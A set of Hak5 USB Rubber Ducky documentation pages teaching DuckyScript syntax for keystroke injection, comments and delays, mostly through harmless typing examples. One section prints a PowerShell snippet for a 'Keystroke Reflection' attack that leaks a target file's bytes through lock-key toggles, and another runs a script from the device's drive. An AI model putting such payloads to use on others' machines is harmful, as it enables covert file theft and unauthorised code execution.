Want to take it just a tiny bit further? Check out these examples for Windows and macOS.
### Windows Example [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-basics/hello-world/#windows-example)
REM A slightly more advanced "Hello, World!" for Windows
DELAY 3000
REM Open the Run dialog
WINDOWS r
DELAY 1000
REM Open powershell with our message
STRING powershell "echo 'Hello, World!'; pause"
ENTER
#### Result [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-basics/hello-world/#result)
* This original Ducky Script payload will open a powershell window showing “`Hello, World!`”.
* It starts by opening the Windows Run dialog using the keyboard shortcut _Windows Key+r_.
* Next it will type a line of powershell which will display “`Hello, World!`”, then pause.
* Finally, it will press `ENTER` to execute the powershell.
### macOS Example [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-basics/hello-world/#macos-example)
REM A slightly more advanced "Hello, World" for macOS
DELAY 3000
REM Open Spotlight Search
COMMAND SPACE
REM Open the text editor
STRING TextEdit
ENTER
DELAY 2000
COMMAND n
DELAY 2000
STRING echo Hello, World!
#### Result [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-basics/hello-world/#result-1)
* This original DuckyScript payload will open a TextEdit window showing “`Hello, World!`”.
* It starts by opening the Spotlight Search using the keyboard shortcut _Command+Space_.
* Next it will type “TextEdit” and press `ENTER`, which will open the TextEdit app.
* Then it will press the keyboard shortcut Command+N to open a new document.
* Finally, after a 2 second delay, it will type “`Hello, World!`”
* * *
[_navigate\_before_ Unboxing "Quack-Start" Guide](https://docs.hak5.org/hak5-usb-rubber-ducky/unboxing-quack-start-guide/)
[Keystroke Injection _navigate\_next_](https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-basics/keystroke-injection/)
---
# Keystroke Injection | Hak5 - USB Rubber Ducky
[](https://docs.hak5.org/hak5-usb-rubber-ducky/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Keystroke Injection
===================
As we’ve seen from the _Hello, World!_ example in the previous section, the `STRING` command denotes keystrokes for injection. The `STRING` command accepts one or more alphanumeric, punctuation, and `SPACE` characters. As you will soon see, cursor keys, system keys, modifier keys and lock keys may also be injected but without the use of the `STRING` command. Keys may even be held and pressed in combination.
Character Keys: Alphanumeric [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-basics/keystroke-injection/#character-keys-alphanumeric)
--------------------------------------------------------------------------------------------------------------------------------------------------------
Each new line containing a number will type the corresponding character.

Alphanumeric keys
The following alphanumeric keys are available:
> `0 1 2 3 4 5 6 7 8 9`
>
> `a b c d e f g h i j k l m n o p q r s t u v w x y z`
>
> `A B C D E F G H I J K L M N O P Q R S T U V W X Y Z`
### Example [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-basics/keystroke-injection/#example)
REM Example Alphanumeric Keystroke Injection
ATTACKMODE HID STORAGE
DELAY 2000
STRING abc123XYZ
#### Result [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-basics/keystroke-injection/#result)
* The USB Rubber Ducky will be recognized by the target as a keyboard and mass storage.
* After a 2 second pause, the “keyboard” (the USB Rubber Ducky in HID mode) will type “`abc123XYZ`”.
info
**All letter keys on a keyboard are lowercase**. In the case of injecting the upper case letters in this example, the USB Rubber Ducky is automatically holding the `SHIFT` modifier for each character.
Character Keys: Punctuation [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-basics/keystroke-injection/#character-keys-punctuation)
------------------------------------------------------------------------------------------------------------------------------------------------------
Similar to the alphanumeric keys, each new line containing a punctuation key will type the corresponding character.

Punctuation keys
The following punctuation keys are available:
> `` ` ~ ! @ # $ % ^ & * ( ) - _ = + [ ] { } ; : ' " , . < > / ? ``
### Example [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-basics/keystroke-injection/#example-1)
REM Example Numeric and Punctuation Keystroke Injection
ATTACKMODE HID STORAGE
DELAY 2000
STRING 1+1=2
#### Result [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-basics/keystroke-injection/#result-1)
* The USB Rubber Ducky will be recognized by the target as a keyboard and mass storage.
* After a 2 second pause, the “keyboard” (the USB Rubber Ducky in HID mode) will type “`1+1=2`”.
STRING [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-basics/keystroke-injection/#string)
-------------------------------------------------------------------------------------------------------------
The `STRING` command will automatically interpret uppercase letters by holding the `SHIFT` modifier key where necessary. It will also automatically press the `SPACE` cursor key (more on that shortly), however trailing spaces will be omitted.
### Example using STRING [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-basics/keystroke-injection/#example-using-string)
Even for single character injections, using `STRING` is recommended.
REM Example Keystroke Injection without STRING
ATTACKMODE HID STORAGE
DELAY 2000
STRING H
STRING ello, World!
#### Result [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-basics/keystroke-injection/#result-2)
* In both examples, the “`Hello, World!`” text is typed.
### Example without STRING [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-basics/keystroke-injection/#example-without-string)
While DuckyScript Classic supported injecting keystrokes without the use of the `STRING` command, each on their own line, this practice is deprecated and no longer recommended.
report
While you may see this used in older payloads it is no longer recommended to use.
REM Example Keystroke Injection without STRING
ATTACKMODE HID STORAGE
DELAY 2000
H
e
l
l
o
,
SPACE
W
o
r
l
d
!
STRINGLN [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-basics/keystroke-injection/#stringln)
-----------------------------------------------------------------------------------------------------------------
The `STRING` command does not terminate with a carriage return. That means at the end of the `STRING` command, a new line is not created.
As an example, imagine injecting commands into a terminal. If the two `STRING` commands “`STRING cd`” and “`STRING ls`” were run one after another, the result would be “`cdls`” on the same line.
### Example [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-basics/keystroke-injection/#example-2)
STRING cd
STRING ls
#### Result [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-basics/keystroke-injection/#result-3)

Multiple `STRING` result
If you intended each command to run separately, the system key `ENTER` (covered shortly) would need to be run after each `STRING` command.
STRING cd
ENTER
STRING ls
ENTER
Alternatively, the `STRINGLN` command may be used. This command automatically terminates with a carriage return — meaning that `ENTER` is pressed after the sequence of keys.
Using `STRINGLN` in the example above would result in both the cd (change directory) command and ls (list files and directories) being executed.
### Example [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-basics/keystroke-injection/#example-3)
STRINGLN cd
STRINGLN ls
#### Result [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-basics/keystroke-injection/#result-4)

Multiple `STRINGLN` result
STRING & STRINGLN Blocks [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-basics/keystroke-injection/#string--stringln-blocks)
------------------------------------------------------------------------------------------------------------------------------------------------
### STRING Blocks [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-basics/keystroke-injection/#string--blocks)
`STRING` blocks can be used effectively to convert multiple lines into one without needing to prepend each line with `STRING`
warning
`STRING` blocks strip leading white space and ignore new lines!
#### Simple STRING block example [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-basics/keystroke-injection/#simple-string-block-example)
STRING
a
b
c
END_STRING
is the equivalent of
STRING a
STRING b
STRING c
Or in this case: `STRING abc`
#### Result [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-basics/keystroke-injection/#result-5)
Deploying this payload will produce the following keystroke injection on the target machine:
`abc`
#### STRING block usecase Example [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-basics/keystroke-injection/#string-block-usecase-example)
Good payloads will optimize the number of keystrokes that need to be injected to achieve their result as fast as possible. The result? Hard to read code that is reduced to a single line.
Below we have an example usage of `STRING` from our `WINDOWS_HID_EXFIL` Extension demonstrating the Keystroke Reflection attack.
For this example its not important that we understand the PowerShell code that is getting injected - Its simply being used to demonstrate how cumbersome it is to digest a monolithic one-liner.
info
The magic of `STRING` blocks is that the two snippets below produce **the exact same result**. The block format one is much easier to read and edit.
STRING foreach($b in $(Get-Content "#TARGET_FILE" -Encoding byte)){foreach($a in 0x80,0x40,0x20,0x10,0x08,0x04,0x02,0x01){If($b -band $a){$o+="%{NUMLOCK}"}Else{$o+="%{CAPSLOCK}"}}};$o+="%{SCROLLLOCK}";Add-Type -Assembly System.Windows.Forms;[System.Windows.Forms.SendKeys]::SendWait("$o");exit;
STRING
foreach($b in $(Get-Content "#TARGET_FILE" -Encoding byte)){
foreach($a in 0x80,0x40,0x20,0x10,0x08,0x04,0x02,0x01){
If($b -band $a){
$o+="%{NUMLOCK}"
}Else{
$o+="%{CAPSLOCK}"
}
}
};
$o+="%{SCROLLLOCK}";
Add-Type -Assembly System.Windows.Forms;
[System.Windows.Forms.SendKeys]::SendWait("$o");
exit;
END_STRING
#### Result [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-basics/keystroke-injection/#result-6)
Deploying this payload will produce the following keystroke injection on the target machine:
foreach($b in $(Get-Content "#TARGET_FILE" -Encoding byte)){foreach($a in 0x80,0x40,0x20,0x10,0x08,0x04,0x02,0x01){If($b -band $a){$o+="%{NUMLOCK}"}Else{$o+="%{CAPSLOCK}"}}};$o+="%{SCROLLLOCK}";Add-Type -Assembly System.Windows.Forms;[System.Windows.Forms.SendKeys]::SendWait("$o");exit;
This is due to the fact that `STRING` blocks strip leading white space, as well as ignore new lines.
### STRINGLN Blocks [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-basics/keystroke-injection/#stringln-blocks)
#### Simple STRINGLN block example [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-basics/keystroke-injection/#simple-stringln-block-example)
`STRINGLN` blocks can be used like [here-doc](https://en.wikipedia.org/wiki/Here_document)
; allowing you to inject multiple lines **as they are written in the payload.**
warning
`STRINGLN` blocks strip the first tab but will preserve all other formatting
STRINGLN
a
b
c
END_STRINGLN
is the equivalent of
STRINGLN a
STRINGLN b
STRINGLN c
#### Result [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-basics/keystroke-injection/#result-7)
Deploying this payload will produce the following keystroke injection on the target machine:
a
b
c
#### STRINGLN block usecase example [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-basics/keystroke-injection/#stringln-block-usecase-example)
Unlike `STRING` blocks, `STRINGLN` blocks will effectively inject code **as its written** (minus the first tab for formatting)
STRINGLN
foreach($b in $(Get-Content "#TARGET_FILE" -Encoding byte)){
foreach($a in 0x80,0x40,0x20,0x10,0x08,0x04,0x02,0x01){
If($b -band $a){
$o+="%{NUMLOCK}"
}Else{
$o+="%{CAPSLOCK}"
}
}
};
$o+="%{SCROLLLOCK}";
Add-Type -Assembly System.Windows.Forms;
[System.Windows.Forms.SendKeys]::SendWait("$o");
exit;
END_STRING
#### Result [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-basics/keystroke-injection/#result-8)
Deploying this payload will produce the following keystroke injection on the target machine:
foreach($b in $(Get-Content "#TARGET_FILE" -Encoding byte)){
foreach($a in 0x80,0x40,0x20,0x10,0x08,0x04,0x02,0x01){
If($b -band $a){
$o+="%{NUMLOCK}"
}Else{
$o+="%{CAPSLOCK}"
}
}
};
$o+="%{SCROLLLOCK}";
Add-Type -Assembly System.Windows.Forms;
[System.Windows.Forms.SendKeys]::SendWait("$o");
exit;
### Embedded Language Blocks [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-basics/keystroke-injection/#embedded-language-blocks)
* `STRING_POWERSHELL` or `STRINGLN_POWERSHELL`
* `STRING_BATCH` or `STRINGLN_BATCH`
* `STRING_BASH` or `STRINGLN_BASH`
* `STRING_JAVASCRIPT` or `STRINGLN_JAVASCRIPT`
* `STRING_PYTHON` or `STRINGLN_PYTHON`
* `STRING_RUBY` or `STRINGLN_RUBY`
* `STRING_HTML` or `STRINGLN_HTML`
info
These variations work just like`STRING` or `STRINGLN` blocks with the added benefit of adding auto-complete and syntax highlighting specific to the language described by the command **when using PayloadStudio Pro Edition**
### Example [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-basics/keystroke-injection/#example-4)

STRING\_POWERSHELL example
check\_circle
This syntax **will work** with PayloadStudio Community edition; only syntax highlighting and auto-complete feature additions are limited to the Pro edition.
Cursor Keys [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-basics/keystroke-injection/#cursor-keys)
-----------------------------------------------------------------------------------------------------------------------
As opposed to character keys, which type a letter, number or punctuation, the cursor keys are used to navigate the cursor to a different position on the screen.
Generally, in the context of a text area, the arrow keys will move the cursor `UP`, `DOWN`, `LEFT` or `RIGHT` of the current position. The `HOME` and `END` keys move the cursor to the beginning or end of a line. The `PAGEUP` and `PAGEDOWN` keys scroll vertically up or down a single page. The `DELETE` key will remove the character to the right of the cursor, while the `BACKSPACE` will remove the character to its left. The `INSERT` key is typically used to switch between typing mode. The `TAB` key will advance the cursor to the next tab stop, or may be used to navigate to the next user interface element. The `SPACE` key will insert a space character, or may be used to select a user interface element.

Cursor keys
The following cursor keys are available:
> `UPARROW DOWNARROW LEFTARROW RIGHTARROW`
>
> `PAGEUP PAGEDOWN HOME END`
>
> `INSERT DELETE BACKSPACE`
>
> `TAB`
>
> `SPACE`
info
The shorthand aliases `UP`, `DOWN`, `LEFT`, and `RIGHT` may be used in place of `UPARROW`, `DOWNARROW`, `LEFTARROW`, `RIGHTARROW` respectively.
### Example [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-basics/keystroke-injection/#example-5)
REM Example Keystroke Injection without Cursor Keys
ATTACKMODE HID STORAGE
DELAY 2000
STRING 456
BACKSPACE
BACKSPACE
BACKSPACE
STRING 123
HOME
STRING abc
END
STRING UVW
LEFTARROW
LEFTARROW
LEFTARROW
DELETE
DELETE
DELETE
STRING XYZ
#### Result [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-basics/keystroke-injection/#result-9)
* The USB Rubber Ducky will be recognized by the target as a keyboard and mass storage.
* After a 2 second pause, the “keyboard” will type `456`
* The `BACKSPACE` key will be pressed 3 times, removing `456`
* The characters `123` will be typed
* The `HOME` key will move the cursor to the beginning of the line
* The characters `abc` will be typed
* The `END` key will move the cursor to the end of the line
* The characters `UVW` will be typed
* The `LEFTARROW` will be pressed 3 times, then the `DELETE` key will be pressed 3 times, removing `UVW`
* The characters `XYZ` will be typed
* The final result will be `abc123XYZ`
System Keys [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-basics/keystroke-injection/#system-keys)
-----------------------------------------------------------------------------------------------------------------------
These keys are primarily used by the operating system for special functions and may be used to interact with both text areas and navigating the user interface.

System keys
The following system keys are available:
> `ENTER`
>
> `ESCAPE`
>
> `PAUSE` `BREAK`
>
> `PRINTSCREEN`
>
> `MENU` `APP`
>
> `F1` `F2` `F3` `F4` `F5` `F6` `F7` `F8` `F9` `F0` `F11` `F12`
Basic Modifier Keys [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-basics/keystroke-injection/#basic-modifier-keys)
---------------------------------------------------------------------------------------------------------------------------------------
Up until now only character, control and system keys have been discussed. These generally type a character, move the cursor, or perform a special action depending on the program or operating system of the target.
Modifier keys, on the other hand, are typically held in combination with another key to perform a special function. One simple example of this is holding the `SHIFT` key in combination with the letter `a` key. The result will be an uppercase letter `A`.
A slightly more complex example would be holding the `ALT` key along with the `F4` key, which typically closes a program on the Windows operating system.
Common keyboard combinations for the PC include the familiar `CTRL c` for copy, `CTRL x` for cut, and `CTRL v` for paste. On macOS targets, these would be `COMMAND c`, `COMMAND x` and `COMMAND v` respectively.

Basic modifier keys
The following basic modifier keys are available:
> `SHIFT`
>
> `ALT`
>
> `CONTROL` `CTRL`
>
> `COMMAND`
>
> `WINDOWS` `GUI`
info
The shorthand aliases `CTRL` and `GUI` may be used in place of `CONTROL` and `WINDOWS` respectively.
### Example: Windows [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-basics/keystroke-injection/#example-windows)
REM Example Modifier Key Combo Keystroke Injection for Windows
ATTACKMODE HID STORAGE
DELAY 2000
GUI r
DELAY 2000
BACKSPACE
STRING 123
DELAY 2000
CTRL a
CTRL c
CTRL v
CTRL v
DELAY 2000
ALT F4
#### Result [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-basics/keystroke-injection/#result-10)
* This example targets Windows systems.
* The USB Rubber Ducky will be recognized by the target as a keyboard and mass storage.
* After a 2 second pause, the `GUI r` keyboard combination will be typed. This will open the Run dialog, a feature of Windows since 1995 that allows you to open a program, document or Internet resource by typing certain commands.
* After another 2 second pause, the `BACKSPACE` key will remove anything remaining in the text area from a previous session and the characters `123` will be typed.
* After yet another 2 second pause, the `CTRL a` keyboard combination will select all text in the text area.
* The keyboard shortcuts for copy and paste twice will be typed, resulting in `123123`.
* After a final 2 second pause, the Windows keyboard combination `ALT F4` will be typed, closing the Run dialog.
### Example: macOS [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-basics/keystroke-injection/#example-macos)
REM Example Modifier Key Combo Keystroke Injection for macOS
ATTACKMODE HID STORAGE VID_05AC PID_021E
DELAY 2000
COMMAND SPACE
DELAY 2000
STRING 123
DELAY 2000
COMMAND a
COMMAND c
COMMAND v
COMMAND v
DELAY 2000
ESCAPE
ESCAPE
#### Result [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-basics/keystroke-injection/#result-11)
* This example targets macOS systems.
* The USB Rubber Ducky will be recognized by the target as a keyboard and mass storage. It is safe to ignore the advanced `VID` and `PID` parameters for `ATTACKMODE` now — they’ll be covered later on.
* After a 2 second pause, and similarly to the Windows Run dialog example, the `COMMAND SPACE` keyboard combination will be typed. This will open Spotlight Search, a feature of macOS since OS X that allows you to open a program, document or Internet resource by typing certain commands.
* After another 2 second pause, the characters `123` will be typed.
* Similar to the previous example, after another 2 second pause the keyboard shortcuts for select all, copy, and paste twice will be typed — resulting in `123123`.
* After a final 2 second pause, Spotlight Search is closed with two `ESCAPE` keys.
Key and Modifier Combos [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-basics/keystroke-injection/#key-and-modifier-combos)
-----------------------------------------------------------------------------------------------------------------------------------------------
In addition to the basic set of modifier keys, PayloadStudio will allow you to arbitrarily combine keys separated either by `SPACE` or `-`
Some often used combinations may already be pre-defined in the language file:
> `CTRL-ALT`
>
> `CTRL-SHIFT`
>
> `ALT-SHIFT`
>
> `COMMAND-CTRL`
>
> `COMMAND-CTRL-SHIFT`
>
> `COMMAND-OPTION`
>
> `COMMAND-OPTION-SHIFT`
### Example [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-basics/keystroke-injection/#example-6)
ATTACKMODE HID STORAGE
DELAY 2000
CTRL ALT DELETE
#### Result [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-basics/keystroke-injection/#result-12)
* The USB Rubber Ducky will be recognized by the target as a keyboard and mass storage.
* After a 2 second pause, the infamous “three finger salute” key combination will be pressed. This may be necessary for login on many Windows systems.
Standalone Modifier Keys [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-basics/keystroke-injection/#standalone-modifier-keys)
-------------------------------------------------------------------------------------------------------------------------------------------------
Normally modifier keys are held in combination with another key. However they may also be pressed by themselves. While in many circumstances this will have no substantial effect on the target, for instance simply pressing `SHIFT` by itself, some keys can sometimes prove quite useful.
Since 1995, the `WINDOWS` (or more formally `GUI`, an alias for the `WINDOWS` key) key has opened the Start menu on Windows systems. One could technically navigate this menu by using the arrow keys and `ENTER`. For instance, pressing `GUI`, then `UP`, then `ENTER` would open the Run dialog on a Windows 95 system. However, as seen in previous examples, the keyboard shortcut `GUI r` would be a much faster and more effective method of opening the Run dialog.
Since Windows 7 the Start menu behavior has changed. Pressing `WINDOWS` or `GUI` on its own will highlight a search textarea — from which commands, documents and Internet resources may be entered similar to the Run dialog.
Similar functionality can now be found on ChromeOS and many Linux window managers.
To press a standalone modifier key in DuckyScript, it must be prefixed with the INJECT\_MOD command.
### Example [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-basics/keystroke-injection/#example-7)
REM Example Standalone Modifier Key Keystroke Injection for Windows
ATTACKMODE HID STORAGE
DELAY 2000
INJECT_MOD WINDOWS
DELAY 2000
STRING calc
DELAY 2000
ENTER
#### Result [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-basics/keystroke-injection/#result-13)
* This example targets Windows systems.
* The USB Rubber Ducky will be recognized by the target as a keyboard and mass storage.
* After a 2 second pause, the `WINDOWS` (or `GUI`) key is pressed. Note the `INJECT_MOD` command on the line above.
* After another 2 second pause, the letters `calc` will be typed.
* The Windows target will most likely select the Calculator app as the best match.
* After a final 2 second pause, `ENTER` will be pressed and the Calculator will likely open.
Lock Keys [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-basics/keystroke-injection/#lock-keys)
-------------------------------------------------------------------------------------------------------------------
These keys specify a distinct mode of operation and are significant due to the bi-directional nature of the lock state. This nuance will come in handy for more advanced payloads — but for now suffice it to say that the three standard lock keys can be pressed just like any ordinary key.

Lock keys
The following lock keys are available:
> `CAPSLOCK`
>
> `NUMLOCK`
>
> `SCROLLLOCK`
### Example [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-basics/keystroke-injection/#example-8)
ATTACKMODE HID STORAGE
DELAY 2000
CAPSLOCK
STRING abc123XYZ
#### Result [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-basics/keystroke-injection/#result-14)
* The USB Rubber Ducky will be recognized by the target as a keyboard and mass storage.
* After a 2 second pause, the `CAPSLOCK` key will be pressed — thus toggling the capslock state.
* If capslock were off before running this payload, the characters `ABC123xyz` will be typed.
* Notice how the capitalization of the keys typed are reversed when Capslock is enabled.
* Keep in mind that uppercase letters, standalone or in a `STRING` statement, automatically hold `SHIFT`.
It is important to note that pressing the `CAPSLOCK` key in this example **toggles** the lock state. This is because the lock state is maintained by the operating system, not the keyboard. In most cases, when the key is pressed the operating system will report back to the keyboard information that indicates whether or not to light the caps lock LED on the keyboard itself.
* [ ] How will the results of the above payload change if caps lock were enabled on the target before the USB Rubber Ducky payload were run?
The USB Rubber Ducky, in many cases, can determine the lock state of the target. As you will soon learn, using this information along with DuckyScript 3.0 logic, a more robust payload can be constructed which will only press the `CAPSLOCK` key if the lock state were not already enabled.
* * *
[_navigate\_before_ Hello, World!](https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-basics/hello-world/)
[Comments _navigate\_next_](https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-basics/comments/)
---
# Comments | Hak5 - USB Rubber Ducky
[](https://docs.hak5.org/hak5-usb-rubber-ducky/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Overview
_article_
Comments
========
Overview [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-basics/comments/#overview)
------------------------------------------------------------------------------------------------------
Comments are annotations added to source code of a payload for the purposes of describing the functionality and making it easier for humans to read and understand. This is especially helpful given the open source nature of DuckyScript payloads.
When sharing, or modifying a shared payload, comments are especially helpful for conveying important aspects, such as constants and variables which may be specific to each user’s particular environment.
As an example, a remote access payload may specify the IP address of a reverse shell listener within a constant. This may be documented within a comment block at the beginning of the payload, or as a single line comment above the definition.
REM [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-basics/comments/#rem)
--------------------------------------------------------------------------------------------
### Syntax [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-basics/comments/#syntax)
REM
The `REM` command does not perform any keystroke injection functions. `REM` gets its name from the word remark. While `REM` may be used to add vertical spacing within a payload, blank lines are also acceptable and will not be processed by the compiler.
### Example [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-basics/comments/#example)
REM This is a comment block.
REM It can be as many lines as you wish, as long as they all begin with REM.
REM This block will not be compiled into the inject.bin file.
REM It will however help fellow DuckyScript programmers understand this payload..
#### Result [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-basics/comments/#result)
* If encoded, this example payload will not perform any keystroke injection.
### Example [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-basics/comments/#example-1)
REM Sometimes it's helpful to add single line comments above specific sections.
ATTACKMODE HID STORAGE
DELAY 2000
GUI r
DELAY 500
REM This executes d.cmd from the drive with the label DUCKY.
STRING powershell ".((gwmi win32_volume -f 'label=''DUCKY''').Name+'d.cmd')"
ENTER
#### Result [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-basics/comments/#result-1)
* This payload executes a cmd file on the root of the USB Rubber Ducky MicroSD card.
* The comment above the `STRING powershell...` line notes the necessity for the volume label of the MicroSD card to be “DUCKY”.
REM\_BLOCK [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-basics/comments/#rem_block)
---------------------------------------------------------------------------------------------------------
Defining a comment block is simple! Start the comment with `REM_BLOCK` and end the comment with `END_REM`; everything in between will be considered a comment without the need to prepend every new line with `REM`. Comment blocks can be especially useful when you have multiple lines to be included in a single comment or want to retain formatting.
### Example [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-basics/comments/#example-2)
Below is an example taken from an `EXTENSION` describing its usage and intended targets.
REM_BLOCK DOCUMENTATION
USAGE:
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
TARGETS:
Any system that reflects CAPSLOCK will detect minimum required delay
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
END_REM
Proper indentation allows this comment block to be collapsed and out of the way after reading.

PayloadStudio Collapsed REM block
Best Practices [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-basics/comments/#best-practices)
------------------------------------------------------------------------------------------------------------------
Payloads, especially those designed to be shared, should begin with a block of comments specifying the title of the payload, the author, and a brief description. Additionally, one may wish to describe the target (OS, version) and any credit or inspiration (commonly commented as props).
REM Title: Full Screen TREE Command
REM Author: Darren Kitchen
REM Description: Runs "tree" in fulll-screen green-on-black cmd window.
REM Target: Windows 95 - 11
REM Props: Korben
ATTACKMODE HID STORAGE
DELAY 2000
GUI r
DELAY 500
STRING cmd /K color a & tree c:\
ENTER
DELAY 500
ALT ENTER
info
While comments are saved in the plaintext source code of a payload (e.g. payload.txt) they are not saved when the payload is compiled into an `inject.bin` file.
* * *
[_navigate\_before_ Keystroke Injection](https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-basics/keystroke-injection/)
[Delays _navigate\_next_](https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-basics/delays/)
---
# BASIC INPUT AND OUTPUT | Hak5 - USB Rubber Ducky
[](https://docs.hak5.org/hak5-usb-rubber-ducky/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
BASIC INPUT AND OUTPUT
======================
* * *
---
# Delays | Hak5 - USB Rubber Ducky
[](https://docs.hak5.org/hak5-usb-rubber-ducky/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Overview
_article_
Delays
======
Delays [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-basics/delays/#delays)
================================================================================================
Overview [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-basics/delays/#overview)
----------------------------------------------------------------------------------------------------
The average computer user types at about 40 words per minute. Sure, maybe us hackers type much faster — say 100-120 words per minute — but compared to how fast a computer processes data, that’s nothing.
So when we think about issuing commands to a computer by way of keyboard input, there’s already an inherent delay simply in that we’re comparatively slow humans. Contrast our fastest typing with our multi-core computers with their gigahertz clock speeds, processing billions of instructions per second.
The USB Rubber Ducky doesn’t type like a human. It types like a computer. Under its hood it’s performing 60,000 processes per second. Often while thinking about building a payload, we forget to add delays because they quite simply aren’t obvious to us as humans.
DELAY [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-basics/delays/#delay)
----------------------------------------------------------------------------------------------
The `DELAY` command instructs the USB Rubber Ducky to momentarily pause execution of the payload. This is useful when deploying a payload which must “wait” for an element — such as a window — to load. The `DELAY` command accepts the time parameter in milliseconds.
DELAY
report
The minimum delay value is 20.
### Example [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-basics/delays/#example)
REM Example Delay
ATTACKMODE HID STORAGE
DELAY 3000
STRING Hello,
DELAY 1000
SPACE
STRING World!
#### Result [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-basics/delays/#result)
* The resulting payload will pause for 3 seconds, then type “`Hello,`” followed by “`World!`” just one second later.
warning
`DELAY` timings might differ slightly depending on the `ATTACKMODE` the USB Rubber Ducky is in when executing the `DELAY` and depending on the target host.
Best Practices [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-basics/delays/#best-practices)
----------------------------------------------------------------------------------------------------------------
`DELAY` in your payloads are useful in two key places. First, at the very beginning. When a new USB device is connected to a target computer, that computer must complete a set of actions before it can begin accepting input from the device. This is called enumeration.
The more complex the device, the longer it will take to enumerate. In the case of a USB scanner or printer, for example, it may be several seconds or minutes while the computer downloads and installs the necessary device drivers.
